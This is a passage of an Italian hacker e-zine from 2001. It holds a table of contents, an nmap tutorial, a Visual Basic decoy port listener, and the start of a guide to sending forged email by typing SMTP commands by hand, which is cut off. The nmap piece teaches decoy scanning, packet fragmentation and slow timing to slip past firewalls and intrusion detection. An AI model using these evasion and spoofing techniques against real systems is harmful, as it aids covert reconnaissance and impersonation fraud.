____ _ _____ _____ __ __ __ _ ____ _____ | _) \| || () )|_ _|\ \/ /| \| || ===||_ _| |____/|_||_|\_\ |_| |__| |_|\__||____| |_|Numero "3" -+-+-+//\\ Rivista numero "3" Marzo 2001 //\\-+-+-+ D I R T Y N E T M A G A Z I N E --=::Inizio Disclaimer::=-- Tutto il contenuto di questo testo è da ritenersi dannoso quindi non applicabile. L'utente è pregato di non mettere in atto quanto scritto .Esso è solo stato pubblicato per offrire una conoscenza maggiore in ambito ,NON per altri scopi.Il testo non si puo' modificare ne tanto meno vendere senza il consenso dell'autore.Se non si rispettano le norme l'utente avrà commesso azione illegale. In questo testo è solamente presente INFORMAZIONE, e l'informazione per legge è LEGALE. Leggendo queste righe tu ACCETTI I TERMINI descritti, se ci fosse qualcosa di contrario alla tua' mente, esci e cancella questo file. --=::Fine Disclaimer::=-- Finalmente è uscita! intro attached -------------------------------------------------------------------------------- Si è concluso un anno ne è incominciato un'altro e rieccoci qui dinuovo davanti ad uno schermo voi per leggere io per scrivere. Siamo giunti alla Dirtynet3 grazie agli sforzi e ai sacrifici di tutti i membri e di tutta quella gente che ha collaborato con noi. In questo nuovo numero sono presenti molti articoli interessanti ma che allo stesso tempo richiedono qualche conoscenza.Ci stiamo impegnando quindi per rendere accessibili a tutti i nostri testi, infatti come avrete notato in ogni numero è presente una lista con le rispettive e-mail di tutti gli autori.Questo perchè il nostro scopo non è solo quello di dare prestigio a questa rivista ma anche quello (anzi soprattutto) di esporre a tutti le nostre conoscenze. Forse molti di voi stanno leggendo questa e-zine solo perchè non hanno niente di meglio da fare visto che il tempo non è dei migliori.Questo articolo quindi è dedicato a tutti i miei amici e a tutte quelle persone che mi stanno vicine tutto l'anno e non a quella gente che viene da me solo quando ha bisogno di qualcosa. Finita questo piccolo sfogo tengo a precisare che questo non è dovuto al mio stato d'animo ma solo al fatto che vorrei cercare di incominciare l'anno con il piede giusto. Credo che questa intro vi abbia un po' annoiato (togliamo il po') quindi vi lascio alla lettura di Dirtynet3.Grazie per l'attenzione. A[v]a[t]A[r] H@ team Ava ti sei sprecato! :=) (800x600 standard full screen) ø!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!--!-¡-!-¡-!-¡-!-¡-¹ ø ø ø INDICE ø ø ø ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥¹ º |Titolo| |Autore| º º º º º º --=Hacking=-- (or coding) º º º º [NMAP QUESTO SCONOSCIUTO..............................|kEwL.........] º º [WINUNIX..............................................|Screener_it..] º º [SENDMAIL E OLTRE.....................................|kEwL.........] º º [MIRC 5.7 DENIAL OF SERVICE EXPLOITS..................|sYn..........] º º [STARSCHEDULE 5.1 WEB SERVER DOS......................|Stevens......] º º [MIMETIZZAZIONE TERMO OTTICA..........................|sYn..........] º º [GUIDA PRATICA ALL'USO DI IPCHAINS....................|kEwL.........] º º [SOCKS SCANNER........................................|.............] º º [WINDOWS 95/98 IGMP FRAGMENT DOS......................|.............] º º [FAKE MAIL : DI TUTTO DI +............................|A[v]a[t]A[r].] º º [NAVIGARE CON VB!.....................................|sYn..........] º º [ATTENTI AL DUCK!.....................................|A[v]a[t]A[r].] º º [CRONACA DI UN SEMPLICE SITE HACK.....................|Mr. A........] º º º º --=Phreaking=-- º º º º [INFORMAZIONI GENERALI SUL PROTOCOLLO WAP.............|A[v]a[t]A[r].] º º [COME T'INFLIPPO LA NUOVA CABINA......................|mR_bIs0n.....] º º º º º º º º --=Riflessione=-- º º º º [RIFLESSIONE..........................................|Jrash........] º º [INTERNET E REALTA'...................................|Jrash........] º º º º º º --=Mezzing=-- º º º º [COME RUBARE UN MOTORINO..............................|Jrash........] º º [COME MONTARE UN VALIDO ANTIFURTO SUL VOSTRO SCOOTER..|Jrash........] º º º º --=Narcoting=-- º º º º [MARIA COLTIVATION....................................|phaet........] º º º º º º --=Miscellanea=-- º º º º [GUIDA ALLA FACILE INSTALLAZIONE DI WINDOWS 2000......|sYn&Norman^B^] º º [MONDO SMS............................................|.............] º º [WRITERS BLOCK (LO STILE).............................|Jrash........] º º [EFFETTO CON IL MIRC!.................................|NCKxxx.......] º º º º º º [Nella prossima release... ] º º º ø!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!--!-¡-!-¡-!-¡-!-¡-¹ ø ø ø Autori e membri ø ø con rispettive e-mail ø ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥¹ º º º [sYn----------------------------------------syn@hackersat.com-------] º º [A[v]a[t]A[r]-------------------------------avatar@hackersat.com----] º º [Screenet_it--------------------------------screener_it@freemail.it-] º º [Jrash--------------------------------------jrash@hackersat.com-----] º º [mR_bIsOn-----------------------------------stusciti@yahoo.it-------] º º [kEwL---------------------------------------kewl@penguinpowered.com-] º º [Ghent--------------------------------------ghent@hackersat.com-----] º º [phaet--------------------------------------vesa8_34@yahoo.it-------] º º [Mr. A--------------------------------------------------------------] º º AScii by sYn^]|[ & kEwL º < w w w . h a c k e r s a t . c o m > 10x ALL! < s[Y]n > Abbasso BERLUSCONI! --------------------------------------=:ALLEGATI (=attc=):=------------------------------------ winunix.zip = Progetto e frm del programma "Winnunix" creato da Screener_it.(leggi testo "WINUNIX" della rivista) Manuale HTML.zip = un bel file passatomi da mio cugino! Una ottima guida all'HTML. pezzo1.gif = pezzo puppet del nostro Jrash. pezzo2.jpg = pezzo del nostro Jrash. pezzo3.jpg = pezzo del nostro Jrash.(sono un po' ripetitivo?) root.gif = un'altra immagine, sfizziosa... ----------------------------------------=Hacking=---------------------------------------------- ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø ø NMAP QUESTO SCONOSCIUTO ø ø kEwL ø ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø NMAP QUESTO SCONOSCIUTO INTRODUZIONE Nmap permette agli amministratori di sistema (e non) di analizzare i propri (e non ;) computers per vedere quali servizi offrono. Con nmap si possono effettuare diversi tipi di scan come per esempio UDP, TCP connect(), TCP syn e altri; inoltre nmap fornisce funzioni avanzate come per esempio il rilevamento del sistema operativo remoto tramite il fingerprint TCP\IP, scanning con decoy, scanning parallelo, ecc. Il risultato di una scansione con nmap sarà una lista di porte e il loro attributo. Una porta può essere aperta (open) filtrata (filtered) o non filtrata (unfiltered). Una porta aperta è una porta che accetta le connessioni. Una porta filtrata ci fa capire che quella porta è protetta da un firewall o qualcosa del genere. Una porta non filtrata è quando nmap sa che la porta è chiusa e non ci sono firewall/filtri che interferiscono con il tentativo di nmap per determinare lo stato di quella porta. RIGA DI COMANDO Ecco la riga di comando che si usa per nmap nmap [tipo di scan] [HOST] I campi obbligatori sono il tipo di scan e l'host. Puoi scegliere solo un tipo di scan per volta mentre puoi inserire tutte le opzioni che vuoi. Ma andiamo a vedere nel dettagli i vari campi. TIPI DI SCAN In questa sezione descriverò i tipi di scan (con il relativo parametro) che nmap può effettuare. a. TCP connect() * -sT Questo è lo scan di base. La chiamata connect() cercherà di stabilire una connessione TCP completa (3way handshake) con ogni porta dell'host remoto. Se la porta è in ascolto, connect() avrà successo e la porta verrà segnalata aperta, altrimenti chiusa. Per eseguire questo scan non hai bisogno dei permessi di root. b. Scan TCP SYN * -sS Questa tecnica è anche conosciuta come scanning "half-open" (mezzo aperto), perchè non si stabilisce una connessione TCP completa. In pratica questo tipo di scan manda un pacchetto SYN all'host remoto; se questo risponde con un SYN\ACK, vuol dire che la porta è aperta, se invece risponde con un RST, la porta è chiusa. Una volta che abbiamo ricevuto il SYN\ACK, verrà immediatamente mandato un RST per interrompere la connessione. Pochi host loggheranno questo tipo di scan, ma per effettuarlo sono necessari i permessi di root. c. Stealth FIN, Xmas Tree o Null scan * -sF -sX -sN A volte uno scan SYN non è abbastanza clandestino perchè ci sono dei firewalls o cose del genere che rintracciano questi scan. Questi tre tipi di scan possono bypassare questi fastidiosissimi firewalls. L'idea di questi tipi di scan deriva dal fatto che le porte chiuse rispondono al tuo pacchetto sonda con un RST mentre le porte aperte ignoreranno il pacchetto in questione. Lo scan FIN manda pacchetti FIN (ma guarda un po'...); Xmas Tree usa i flags FIN, URF e PUSH; Null scan infine spegne tutti i flags. Questi tipi di scan funzionano solo con macchine non windows, poichè la micro$oft ha deciso di ignorare gli standards e di fare le cose a modo loro. d. Ping scanning * -sP Questo tipo di scan serve solo a verificare quali macchine sono attive nella rete che vogliamo verificare. Normalmente, questo scan avviene mandando un ICMP echo a ogni indirizzo IP della rete, ma siccome ci sono delle reti che bloccano i pacchetti ICMP echo (vedi microsoft.com), vengono usati altri 2 metodi per verificare se una macchina è attiva. Il primo modo è di mandare un pacchetto TCP ack alla porta 80; se arriva un RST, vuol dire che la macchina è attiva. L'altro modo è mandare un pacchetto SYN e aspettare un RST o un SYN\ACK. Se non abbiamo i permessi di root, verrà usato il metodo connect(). e. UDP scan * -sU Questo metodo viene utilizzato per trovare le porte UDP aperte su un host. Per fare ciò, il nostro buon nmap manda dei pacchetti udp di 0 byte all'host che ci interessa. Se riceviamo un messaggio ICMP port unreachable, vuol dire che la porta è chiusa, altrimenti pensiamo che la porta è aperta. f. ACK scan * -sA Questo metodo avanzato serve a rintracciare i rules di un firewall. Questo tipo di scan manda un pacchetto ACK alle porte specificate. Se riceviamo un RST, la porta è classeificata come non filtrata (unfiltered); se invece non riceviamo niente, oppure riceviamo un ICMP unreachable, la porta è classificata filtrata (filtered). Questo tipo di scan non mostra le porte aperte (open). g. Window scan * -sW Molto simile all'ACK scan, a volte rintraccia porte aperte come filtrate o non filtrate a causa di un'anomalia nella dimensione della finestra TCP in alcuni sistemi operativi come AIX, UNIX, FreeBSD, OS/2, SunOS 4.x e altri. h. RCP scan * -sR Questo metodo lavora in combinazione con gli altri metodi di Nmap. Prende tutte le porte aperte trovate e le flooda nel tentativo di trovare porte RCP. i. FTP bounce attack * -b Sfrutta un FTP come proxy. OPZIONI GENERALI Ecco delle opzioni che potrebbero essere utili -P0 : Non manda ping prima di scansionare un host. Permette la scansione di reti che non permettono le richieste ICMP echo. -PT : Usa il TCP ping per determinare gli hosts attivi. Manda un ACK al posto di un ICMP. -PS : Usa un pacchetto SYN per determinare gli hosts attivi. -PI : Usa un ICMP echo per determinare gli hosts attivi. -PB : E' il tipo di ping predefinito. Usa sia ACK che ICMP. -O : Rileva il sistema operativo dell'host remoto grazie al TCP\IP fingerprint. -I : Attiva il TCP reverse ident scanning. Viene interrogato l'identd dell'host remoto ad ogni porta aperta trovata. -f : Suddivide l'header TCP in più pacchetti negli scan SYN, FIN, XMAS e NULL, in modo da non far rintracciare lo scan a firewalls e simili. -v : Ti informa cosa sta succedendo passo dopo passo. Usalo due volte per un effetto maggiore. -h : Mostra una schermata con un aiuto veloce su nmap. -oN : Memorizza i risultati dello scan in un file di log. -oM : Simile a quello di sopra solo che mostra anche i messaggi d'errore. -oS : Memorizza i risultati dello scan in un file di log con caratteri speciali. -resume : Recupera uno scan che è stato interrotto da un control-C o un errore generico. Il file di log deve essere memorizzato o con -oN o con -oM. -iL : Legge le specifiche dell'obiettivo tramite l'inputfile. -iR : Dice a nmap di generare da solo degli hosts prendendo numeri a caso. -p : Specifica l'intervallo di porte (o la porta) che vuoi scansionare. -p 23 controlla solo la porta 23 mentre -p 1000-2000 controlla le porta da 1000 a 2000. -F : Specifica che vuoi scansionare solo le porte specificate nel file dei servizi distribuito con nmap. -D : Fa vedere all'host che stai scansionando che lo scan viene effettuato anche dai decoy (IP) che inserisci. L'IDS vedrà tutti gli ip che hai inserito e non sarprà da che ip viene realmente lo scan. E' molto buono per nascondere il tuo indirizzo IP. Puoi usare ME (che sarebbe il tuo IP) tra i decoys; se lo inserisci tu rispetterà quella posizione, mentre se non lo inserisci gli verrà assegnata una posizione non definita. Ricordo che i decoys devono essere indirizzi ip di macchine attive, altrimenti non farai altro che floodare son dei SYN il tuo obiettivo. -S : In alcuni casi nmap non riconosce il tuo indirizzo IP e quindi devi specificarlo con questo parametro. Viene usato in combinazione con -e (che specifica l'interfaccia). Con questo parametro volendo si può anche cambiare il proprio indirizzo IP ... ma non lo dite a nessuno ;). -e : Dice a nmap quale interfaccia manda e riceve i pacchetti. -g : Specifica la porta sorgente da cui vengono effettuate le connessioni per il port scan. -r : Dice a nmap di non scansionare le porte a casaccio. --randomize_hosts : Dice a nmap di mischiare ogni gruppo fino a 2048 hosts prima di scansionarli. Questo può rendere le scansioni meno ovvie ai vari NIDS. -M : Setta il numero massimo di socket che devono essere usati in uno scan TCP connect(); questo rallenterà un po' lo scan ma saremo sicuri che le macchine remote non crasheranno. OPZIONI DI TEMPO -T : E' la velocità della scansione. Paranoid scansiona *molto* lentamente per evitare di essere rintracciati dagli IDS; aspetta 5 minuti prima di mandare i pacchetti. Sneaky è simile, solo che aspetta 15 secondi prima di mandare i pacchetti. Polite aspetta 0.4 secondi prima di mandare i pacchetti ed è probabile che la macchina remota non crashi. Normal è il comportamento standard di nmap, e manda i pacchetti appena possibile, senza sovraccaricare la rete. Aggressive aggiunge un timeout di 5 minuti per ogni host e non aspetta mai più di 1.25 secondi per controllare le risposte. Insane è fatto solo per reti veloci; aggiunge un timeout di 75 secondi e aspetta solo 0.3 secondi per le risposte. Puoi usare anche i numeri al posto delle parole (0=Paranoid,...,5=Insane). --hosts_timeout : Specifica quanto tempo nmap deve aspettare prima di lasciar perdere quell'IP. --max_rtt_timeout : Specifica quanto tempo nmap deve aspettare per controllare la risposta prima di rispondere. --min_rtt_timeout : Aspetta almeno il tempo prestabilito prima di lasciar perdere una risposta. --initial_rtt_timeout : Specifica il timeout iniziale di risposta. --max_parallelism : Specifica quanti scan può effettuare nmap in parallelo. --scan_delay : Specifica l'intervallo di tempo minimo che nmap deve aspettare tra le risposte. COME SI SCRIVE UN OBIETTIVO? Tutto quello che non è un'opzione, per nmap è un obiettivo. Puoi specificare solo un indirizzo IP, come per esempio 212.216.145.12, oppure puoi specificare anche delle sottoreti, scrivendo 212.216.145.12/MASK. Una mask può essere 0 (scansiona tutto internet), 16 (scansiona indirizzi di classe B, 24 (scansiona indirizzi di classe C) e 32 (scansiona solo quell'indirizzo IP). Al posto della mask si possono usare anche gli asterischi. Infatti puoi scansionare range di IP scrivendo, per esempio, 212.216.*.*. Al posto di usare gli asterischi si possono usare anche altri modi, come per esempio 212.216.0-255.0-255 (che è la stessa cosa che abbiamo scritto prima). ESEMPI Allora...dopo aver scritto tutto sto papocchio facciamo qualche esempio pratico. Cominciamo a fare uno scan TCP connect(), all'indirizzo 194.195.25.35 (per esempio). Scriviamo: nmap -sT 194.195.25.35 Facile no? Se volevamo fare uno scan SYN? Basta sostituire -sS a -sT ed il gioco è fatto! E se per esempio vogliamo sapere il sistema operativo del computer remoto? Niente di più facile! Aggiungiamo il parametro -O. E se per esempio vogliamo fare uno scan con dei decoys? Non bisogna far altro che aggiungere -D 212.216.123.2,213.213.7.50,194.184.26.54,210.212.190.5 (per esempio) ed il gioco è fatto (consiglio di mettere sempre almeno 5 decoys). Potete effettuare migliaia di tipi di scan combinando le moltissime opzioni che nmap mette a disposizione. Bene ora che sapete cos'è nmap e sapete come si usa (almeno lo spero! ;) andate a scaricarlo a http://www.insecure.org/nmap e buon divertimento! Se avete qualche domanda da farmi o se volete correggermi o semplicemente se vi sto antipatico/simpatico non esitate a mandarmi un'email. Grazie per l'attenzione! Alla prox...byeeeeeee! ;P kEwL` ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø ø WINUNIX ø ø Screener_it ø ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø */*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\ Autore: Screener_it email: screener_it@freemail.it URL: www.tankcommandos.org DATA: 07/01/01 */*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\ Le caxxate che si dicono in giro per la rete sono tante. Tantissime !! Dalle leggende metropolitane, ai giudizi affrettati, alle idee fisse nella mente di chi ha sentito solo una campana.. Di leggende metropolitane ne avete sentite anche troppe, giudizi affrettati anche.. Le idee fisse cosa sono ? Sono le idee messe in giro da una minoranza che sono poi diventate il pensiero della massa.. La più classica è che per forza chi è un hacker è un anarchico. E allora giù con i ragazzini che riempiono i loro siti di stemmi anarchici credendo che così sono molto più underground. Un'altra idea fissa è quella che odio di più: Visual Basic è un linguaggio da lamer.. E questo perchè ?? Semplice, è un prodotto della Microsoft e quindi tutto quello che è Microsoft = lamer. Dimenticando che Ms-Dos è un frutto della MS, dimenticando che il 99% ha iniziato a usare il pc con Windows ( 3.1, 95, 98, ..). Alzi la mano (scriva 'na mail) chi ha iniziato a usare il pc installandosi Linux da solo !!!!!!!!!!!! E' vero, alcuni prodotti della MS sono discutibili, prezzi vergognosi, però.. Diamo alla MS quello che è della MS !!! Visual Basic non è un linguaggio più avanti, è verissimo !! E' pur sempre vero che con poche righe di comandi si possono fare programmi eccellenti. Ho aggiunto una campana al coro. Ascoltatele tutte prima di farvi una vostra idea !!! */*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\ Oggi parleremo di come creare WinUnix !! E che caxxo è WinUnix ?? WinUnix è un programma nato dalla mia mente malata per confondere gli avversari che mi fanno scanning, per avvertirmi di tentativi di connessione, ecc.. Questo programma infatti apre porte classiche di un sistema Unix-like ( telnet su tutte ) o cmq porte non usuali su un computer casalingo ( POP3, SMTP, finger, ecc..) e così a un eventuale scanning l'attaccante si troverebbe in difficoltà a riconoscere un sistema Windows.. In più in caso di scanning / tentativi di connessione mi avverte indicandomi l'ip dell'attaccante e la porta a cui ha provato a collegarsi !! Di cosa abbiamo bisogno per creare questo programmino ??? Poca roba: 1.- Visual Basic 5 (o succ.) 2.- Un po' di esperienza in Vb non guasta (ma possiamo farne a meno). */*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\ Allora, cominciamo.. Prendete Visual Basic e versatelo in un recipiente abbastanza capiente e iniziate a mescolare.. No, caxxo, ho sbagliato guida !! Prima due paroline su cosa faremo. Questo programma si metterà in ascolto sulle seguenti porte: 23 (telnet) 25 (SMTP) 79 (finger) 110 (POP3) E fin qui ci siamo. Una cosa in più: queste porte nella realtà usano il protocollo TCP. Come ben sapete in rete esistono principalmente due protocolli: il TCP e l'UDP. Una certa differenza tra i due c'è, spiegarla qui è inutile, cmq sappiate che il più usato è il TCP, che è anche il più sicuro, xkè, al contrario dell'UDP, controlla che i dati siano arrivati a destinazione, mentre l'UDP lancia i dati e.. Se arrivano bene, se non arrivano.. Cmq dato che vogliamo essere il più vicino possibile alla realtà useremo anche noi il protocollo TCP per questo progetto. Per creare applicazioni Visual Basic che interagiscono con le potenzialità di Internet abbiamo bisogno di un componente particolare di Visual Basic ! Il suo nome è Winsock e si carica in Visual Basic semplice andando in Progetto / Componenti e dall'elenco che appare selezionare "Microsoft Winsock Control" e poi cliccare Ok. Se andate nella barra degli strumenti a sinistra vedrete che ora è apparso un disegnino con due computer. Se ci andate sopra vedrete la scritta "Winsock". Perfetto.. Ora si tratta di aggiungere questo componente alla nostra form. Cliccate sopra quel disegnino di prima e poi portatelo nel form. Perfetto !! Nella form apparirà questo disegnino con il nome di Winsock1. Ma cos'è il Winsock ?? Il Winsock non è altro che un componente di Visual Basic che funziona in modo simile a telnet. Esso infatti può creare una connessione tra due pc, spedire stringhe di dati da un pc all'altro, ecc.. Capito ? Bene. Andate a destra, dove vedete un finestra con il titolo "Propietà". Prima cosa vedete la propietà (Name). Per non fare confusione lo chiameremo TCP1. Scorrete l'elenco e arrivate fino alla propietà Protocol e controllate che siano impostate su sckTCPProtocol, ok ?? Ogni porta del nostro progetto ha bisogno di un componente Winsock, quindi sulla form dobbiamo crearne quattro. Che chiameremo TCP1, TCP2, TCP3, TCP4. Ok ??? Sono importanti i nomi, altrimenti più avanti non capirete niente !! Inserite poi: 1 label con nome "lblip" 1 label con nome "lblporta" entrambe devono essere vuote. Ok, adesso passiamo al codice vero e proprio. Fate doppio clic su un punto qualsiasi della form e vi apparirà la scritta: Private Sub Form_Load() End Sub che voi completerete in questo modo: Private Sub Form_Load() TCP1.LocalPort = Val(23) TCP1.Listen TCP2.LocalPort = Val(25) TCP2.Listen TCP3.LocalPort = Val(79) TCP3.Listen TCP4.LocalPort = Val(110) TCP4.Listen End Sub Che abbiamo fatto ?? Semplice !! Ogni volta che il programma parte automaticamente i quattro Winsock che abbiamo messo nel form si metteranno in ascolto sulle porte decise da noi. TCP1.LocalPort = Val(23) Questa riga serve per indicare al controllo TCP1 su quale porta operare (in questo caso la 23). TCP1.Listen Questa riga serve ad indicare al controllo TCP1 cosa fare.. In questo mettersi in ascolto sulla porta che prima abbiamo indicato. Ok, adesso le porte sono in ascolto.. E adesso che facciamo ???? Dobbiamo dire ai vari protocolli come comportarsi in caso di connessione.. Quindi nel codice della form aggiungete questa riga: Private Sub TCP1_ConnectionRequest(ByVal requestID As Long) End Sub In mezzo a questa righe dovete dire al controllo come comportarsi in caso di richiesta di connessione.Noi vogliamo che quando c'è un tentativo di connessione ci avverta indicandoci l'ip dell'attaccante e la porta alla quale ha tentato di attaccarsi !! Quindi: Private Sub TCP1_ConnectionRequest(ByVal requestID As Long) lblip = TCP1.RemoteHostIP lblporta = "23" TCP1.Close TCP1.LocalPort = Val(23) TCP1.Listen End Sub Un po' di spiegazioni ve le devo, eh ?? Allora.. In caso di tentativo di connessione alla controllo TCP1 (che controlla la porta 23) nella casella lblip apparirà l'ip dell'attaccante: lblip = TCP1.RemoteHostIP E nella casella lblporta apparirà la porta alla quale ha tentato di collegarsi.. In questo caso la 23. Dopodiche che succede ?? Dopo averci informato dell'attacco il programma ci difende dall'attaccante, chiudendogli la connessione con il nostro pc: TCP1.close E poi si rimette in ascolto sulla stessa porta in attesa di nuovi attacchi.. Facciamo lo stesso lavora sul controllo TCP2... Private Sub TCP2_ConnectionRequest(ByVal requestID As Long) lblip = TCP2.RemoteHostIP lblporta = "25" TCP2.Close TCP2.LocalPort = Val(25) TCP2.Listen End Sub E poi sugli altri controlli... */*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\ I codici principali del programma si chiudono qui, ma evidentemente ha bisogno di qualche ritocco.. Infatti per adesso il programma funziona ma è molto rozzo.. Vi troverete a una form grigia che quando c'è una connessione diventa così: ____________________ | | | | | 192.132.134.135 | | 25 | |____________________| Direi che è piuttosto misera.. Aggiungiamo un po' di roba.. Prima di tutto un label con la scritta:"Ip attaccante:" e una con scritto "Porta:" Mh.. Sì, meglio ma ha bisogno di qualche ritoccatina.. Sarebbe meglio che vediamo la form solo qualche veniamo "attaccati".. Imposta la propietà visible della form su false.. Vogliamo che appaia solo quando nella casella lblip appare un ip.. Giusto ? Che appaia in primo piano per avvertirci del pericolo.. Mo Ecco qui il codice: Private Sub lblip_Change() If lblip = "" Then Me.Visible = False Else lblip.Visible = True SetWindowPos Me.hWnd, HWND_TOPMOST, 0, 0, 0, 0, SWP_NOACTIVATE Or SWP_SHOWWINDOW Or !! SWP_NOMOVE Or SWP_NOSIZE End sub E nelle dichiarazioni mettete questi codici: Const HWND_TOPMOST = -1 Const HWND_NOTOPMOST = -2 Const SWP_NOSIZE = &H1 Const SWP_NOMOVE = &H2 Const SWP_NOACTIVATE = &H10 Const SWP_SHOWWINDOW = &H40 Private Declare Sub SetWindowPos Lib "User32" (ByVal hWnd As Long, ByVal hWndInsertAfter As !! Long, ByVal X As Long, ByVal Y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) Dove vedete i punti di esclamazione ( !! ) è xkè dovete mettere tutto su una riga nel programma, non andare a capo come ho fatto io.. Poi ci aggiungiamo un pulsantino ( command1 ) che se cliccato fà diventare la form di nuovo invisibile: Private Sub Command1_Click() lblip = "" lblbporta = "" me.Visible = False End Sub */*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\ Ok, io avrei finito.. Se non avete chiaro qualcosa insieme alla rivista dovrebbero esserci allegati i sorgenti scritti in Vb 6 di questo programma. Se ancora avete dubbi sendatemi una mail: screener_it@freemail.it */*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\ Finito !! Un saluto particolare a: - Tutti quelli che scrivono su Dirty Net - I ragazzi di #hackersonline su AzzurraNet e #hack.it su irc.tin.it - Syn^, Spyro, MrWolf, Bakunin, BigAlex, Tripping, GreenDragon - Tutti quelli che si sono visti il derby Milan - Inter del 07/01 che io vedrò stasera a casa mia (volevo andare anch'io, non è giusto !!!) - A Fabrizio, il primo anarchico-leghista della storia !! :)))) */*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\ ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø ø SENDMAIL E OLTRE ø ø kEwL ø ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø =========================================================== Sendmail e oltre: Consigli di Ankit Fadia ankit@bol.net.in =========================================================== Benvenuto a un altro manuale delle Verità sull’Hacking. Benchè questo manuale viene dopo un lungo periodo di pausa, è molto bello tornare a scrivere per l’HT. Comunque, nel passato, abbiamo avuto un numero di spiegazioni su come mandare email false, come giocare con il demone Sendmail, gli headers delle email e tutto quello che si può fare con SMTP (Simple Mail Transfer Protocol) e email. Benchè questo manuale mette troppo in luce la materia trattata, è comunque più mirato su consigli avanzati e altre informazioni poco comuni ma molto utili. Ora, abbiamo già imparato come si fa, telnettarsi alla porta 25 di un server mail e mandare un email (anche un’email falsa) scrivendo semplicemente alcuni comandi SMTP. Comunque, per il beneficio dei dilettanti e di rinfrescare la memoria delle persone pratiche ma smemorate, ripercorreremo velocemente tutto il processo. Prometto di renderlo quanto più breve è possibile, allo stes-so tempo facile da capire. La porta 25 è la Porta Sendmail dove è eseguito il demone SMTP. Questo demone è infatti il demone che gestisce la posta in uscita. Tutti i client email mandano le email connettendosi alla porta 25 di un server email ed emettendo i comandi SMTP. Questo processo è automatizzato e viene eseguito in background. Comunque, ognuno può manualmente connettersi (telnet) alla porta 25 di un server mail e manualmente scrivere i comandi SMTP in modo da mandare le email. Ripoterò i comandi di base. Per dettagli riguardanti l’uso individuale dei comandi, scrivi semplicemente la parola ‘help’ seguita dal comando al prompt di Sendmail. Nota: L’esempio seguente manda una mail da ankit@bol.net.in a namitas@bol.net.in emettendo i comandi SMTP al server mail: mail.isp.com. Le risposte del server mail hanno un numero che precede esse mentre i comandi scritti dall’utente non hanno numeri. *********************************************************************************************** C:\windows>telnet mail.isp.com 220 mail.isp.com ESMTP Sendmail 8.9.1 (1.1.20.3/07Jul00-0916AM) Thu, 7 Dec 2000 17:18:50 +0530 (IST) helo ankit.com 250-mail.isp.com Hello [203.xx.yyy.91], pleased to meet you mail from: ankit@bol.net.in 250 ankit@bol.net.in... Sender ok rcpt to: namitas@bol.net.in 250 namitas@bol.net.in... Recipient ok data 354 Enter mail, end with "." on a line by itself This is the part where the body of the message is typed in. . 250 RAA0000001693 Message accepted for delivery *********************************************************************************************** Gli headers della email sopra riportata come visto dal destinatario sono i seguenti: *********************************************************************************************** Return-Path: Received: from ankit.com by mail.isp.com (8.9.1/1.1.20.3/07Jul00-0916AM) id RAA0000001693; Thu, 7 Dec 2000 17:19:49 +0530 (IST) Date: Thu, 7 Dec 2000 17:19:49 +0530 (IST) From: Ankit Fadia Message-Id: <200012071149.RAA0000001693@mail.isp.com> X-UIDL: 920156a3b926c5193036933e6d04efd5 This is the part where the body of the message is typed in. *********************************************************************************************** In ogni modo, ora che abbiamo richiamato la linea di base del processo di mandare manualmente una email, muoviamoci sul soggetto principale di questo manuale. Il campo del Soggetto senza soggetto ------------------------------------ Ora, poiché ho pubblicato il manuale per mandare emails false (Sending emails using SMTP com- mands) ho ricevuto un numero di emails che mi chiedevano cose del genere: ‘Come specificare il soggetto di una email mandata manualmente connettendosi alla porta 25 di un sistema?’. O ‘come specificare destinatari CC e BCC mentre mentre faccio queste cose?’ Bene, in questa sezione di- scutiamo su questo. Innanzitutto, impariamo come specificare il soggetto di un email lavorando manualmente con i co- mandi SMTP. Bene, il processo per specificare il soggetto rimane abbastanza simile al normale processo di mandare emails manualmente. Attualmente tutti i comandi rimangono gli stessi prima che diamo il comando ‘data’. Dopo che abbiamo dato il comando ‘data’, il server mail remoto ri- sponderà con il seguente messaggio: 